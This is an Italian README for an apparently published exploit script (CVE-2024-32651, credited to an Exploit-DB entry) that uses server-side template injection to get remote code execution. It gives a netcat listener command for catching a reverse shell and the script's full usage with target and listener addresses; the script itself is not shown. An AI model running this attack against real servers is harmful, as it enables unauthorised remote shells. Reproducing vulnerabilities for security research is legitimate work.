
Exploit di Iniezione di Template Lato Server
Exploit di Iniezione di Template Lato Server!!
Esecuzione di Codice Remota tramite Iniezione di Template Lato Server (SSTI) in Applicazione Web Vulnerabile
Questo exploit prende di mira un'applicazione web vulnerabile a Iniezione di Template Lato Server (SSTI). Sfruttando questa vulnerabilità, un attaccante può eseguire comandi arbitrari sul server. Lo script Python fornito automatizza il processo di sfruttamento inviando un payload che attiva una reverse shell.
Per riprodurre la vulnerabilità, esegui lo script Python fornito contro l'applicazione web vulnerabile. Assicurati di avere un listener in esecuzione (es. nc -lvp 9999) per catturare la connessione della reverse shell.
Salva lo script in un file chiamato CVE-2024-32651.py.
Installa le librerie Python richieste se non già installate:
pip install requests beautifulsoup4
Per utilizzare lo script, fornisci i seguenti argomenti da riga di comando:
--url: URL base dell'applicazione web vulnerabile (es. http://10.10.10.10:5000).--port: Porta del listener (es. 9999).--ip: Indirizzo IP del listener (es. 10.10.50.22).--notification: (Opzionale) URL di notifica se desideri usare un URL di notifica specifico.python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
Questa versione corretta dell'exploit si basa su un exploit originale pubblicato da Zach Crosman (zcrosman) con EDB-ID: 52027. Puoi visualizzare l'exploit originale qui. Ringrazio Zach Crosman per il suo contributo alla comunità della sicurezza.